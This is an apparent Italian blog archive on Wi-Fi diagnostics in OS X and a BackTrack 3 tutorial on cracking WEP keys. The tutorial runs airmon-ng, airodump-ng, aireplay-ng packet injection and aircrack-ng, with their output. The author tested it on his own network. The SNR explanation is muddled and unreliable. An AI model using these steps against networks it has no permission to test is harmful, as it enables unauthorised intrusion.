logo

Archive for Wireless

Scanner e Analisi reti WI-FI

Se si riscontrano problemi di connettività sulla rete wireless è possibile verificare lo stato della stessa ricorrendo all’applicazione Diagnosi Wireless presente nelle più recenti versioni di OS X. L’applicazione non solo esamina e identifica i problemi relativi alla connessione wi-fi ma fornisce varie utility che  consentono di visualizzare la qualità della connessione, la forza del segnale, il disturbo presente sulla rete ed infine fornisce una indicazione dei canali migliori da utilizzare.

WIFI Diagnosi

Una volta avviata l’applicazione selezionare  Finestra –  Utility (cmd + 2) ed apparirà una finestra con varie  opzioni:

– Analisi WI-FI effettua una scansione delle reti presenti, fornisce indicazioni sul RSSI, sul Disturbo presente, il Canale utilizzato ed in fine indicazioni sul canale migliore da utilizzare:


Analisi WIFI

– Nella sezione Informazioni sono evidenziati tutti i dati relativi alla connessione WI-FI attualmente in uso:

WIFI Informazioni

 

– Particolarmente interessante è la sezione Prestazioni che mostra, anche graficamente, l’andamento nel tempo del Segnale in dBm, il Rumore presente e calcola anche l’SNR:

 WI-FI Prestazioni ecc

 

– Lo snapshot successivo mostra  come varia la qualità del segnale e dell’RSSI quando ci si sposta da una stanza ad un’altra, pertanto è particolarmente utile per determinare la posizione ottimale del router al fine di avere la massima copertura in tutte le stanze:

WI-FI Prestazioni

Il valore del Signal to Noise Ratio (SNR) fornisce una indicazione della potenza del segnale WI-FI ricevuto, più il suo valore è alto (tendente allo zero) più il segnale è forte, esso rappresenta la differenza tra il Segnale RSSI ed il Rumore presente. Valori di Rumore tra 90 dBm e 100 dBm possono essere considerati trascurabili. Per valutare i valori del SRN si può fare riferimento alla seguente scala:

Valori da 40 in: Eccellente 

Valori fra i 25 e i 40: Buono

Valori fra 15 e 25: Sufficiente

Valori fra i 10 e i 15: Scarso

Valori inferiori a 10: Insufficiente

Back|Track 3

dragon_small.jpg

Per tutti gli appassionati dei penetrations test è disponibile la versione 3 di Back|Track, avevo già provato la versione beta 3 con ottimi risultati.

Back|Track Packet injection con AirPort

dragon_small.jpg

Molti insistono ad impiegare, o meglio a provare ad utilizzare Kismac con la scheda Airport del Macbook con la speranza di violare una rete wireless, attualmente è impossibile. L’unica cosa che possono fare è abilitare i drivers per il “passive mode” (vedete l’articolo relativo) ma niente di più.

Con questo non voglio dire che con la scheda Airport non si può fare l’injection, è solo che per farlo usano la piattaforma sbagliata.

Difatti per abilitare tale funzione occorre solo il giusto programma:

Backtrack

una distribuzione live di Linux (circa 700 Mb) con vari utili programmi tra i quali Aircrack.

La procedura è molto semplice:

Andate sul sito http://www.remote-exploit.org/backtrack.html e scaricate l’immagine iso .

Una volta scaricata l’immagine masterizzatela su un CD (consiglio di farlo con Utility Disco/Masterizza senza complicarvi la vita con altri programmi).

Creato il cd lasciatelo inserito nel computer ed riavviate il MAC tenendo premuto il tasto C in modo tale da avviare da CD-rom, partirà l’installazione.

Quando vi verrà chiesto la modalità grafica vi consiglio di scegliere KDE.

Una volta installato aprite il pannello All Applications e sfogliate le seguenti cartelle:

Backtrack

Radio Network Analysis

80211

Cracking

Aircrack

Dalla cartella Aircrack avviate tre programmi in tre diverse Shell:

Air Replay

Aiodump

Aircrack

La procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come procedere.

Il test è stato eseguito sulla mia rete Wireless per l’occasione protetta con chiave WEP.

Dalla Shell Airodump digitate:

iwconfig

e scoprite la sigla attribuita alla vostra scheda wifi:

lo no wileress extensions

eth0 no wileress extensions

wifi0 no wireless exensions

ath0 IEEE 802.11g ESSID:”” Nikname:””

Mode: Managed Channel:0 Access Point Not-Associated

Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity:1/1

Retry:off RTS thr:off Fragment thr:off

Encription key :off Power Management:off

digitate

airmon-ng start wifi0:

interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

che abilita ath1 (la mia scheda) in monitor mode

poi:

airodump-ng ath1

segnatevi il canale CH e fermate l’applicazione:

ctrl C

digitate:

airodump-ng -c 1 -w pippo ath1

Airodump inizierà a lavorare e salverà di dati catturati nel file pippo-01.cap

Adesso per stimolare la produzione di IVs procedete con l’injection:

per testare se la scheda funziona:

aireplay-ng -9 ath1

se è tutto ok apparirà:

Trying broadcast probe requests….

Found 1 AP

poi procederò a pingare gli Access Point disponibili:

Trying directed probe requests

00:19:xx:xx:xx:xx – channel 1 – ‘Alice-xxxxxx’

Ping (min/avg/max): 3.969ms/104.333ms/171.666 ms Power 78.79

30/30: 100%

Injection is working!

aireplay-ng -3 -b (indirizzo MAC del A.P.) -d ff:ff:ff:ff:ff:ff -h (indirzzo MAC del T.C.) ath1

ed ecco partire l’injection dalla nostra Airport.

Dalla Shell di Airodump tenete sotto controllo i paccketti IVs catturati e, quanto arrivate ad un numero discreto (a me ne sono bastati 34000), procedete con il cracking.

Dalla Shell di Aircrack digitate

aircrack-ng -a 1 pippo-01.cap

se i pacchetti catturati sono sufficienti, in pocki secondi otterrete la chiave.

Come già detto per i dettagli e le varie modalità di attacco leggete l’articolo relativo a Aircrack ng.

Buon lavoro